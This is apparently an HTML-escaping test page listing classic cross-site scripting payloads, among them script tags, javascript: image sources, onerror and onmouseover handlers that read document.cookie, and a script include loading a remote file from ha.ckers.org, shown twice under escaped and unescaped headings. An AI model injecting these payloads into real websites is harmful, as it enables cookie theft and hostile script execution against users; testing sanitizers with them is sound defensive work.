<script>alert('hihihihih');</script>
Escaped HTML:
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script>alert('this script & should not show');
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
Unescaped HTML:
<img src="." onerror=alert(document.cookie)>,
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script>alert('this script & should not show');
</script>,
<img src="" onerror=alert("A & B")>,
<script>alert('&');</script>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
Escaped HTML:
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script>alert('this script & should not show');
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
Unescaped HTML:
<img src="." onerror=alert(document.cookie)>,
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script>alert('this script & should not show');
</script>,
<img src="" onerror=alert("A & B")>,
<script>alert('&');</script>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
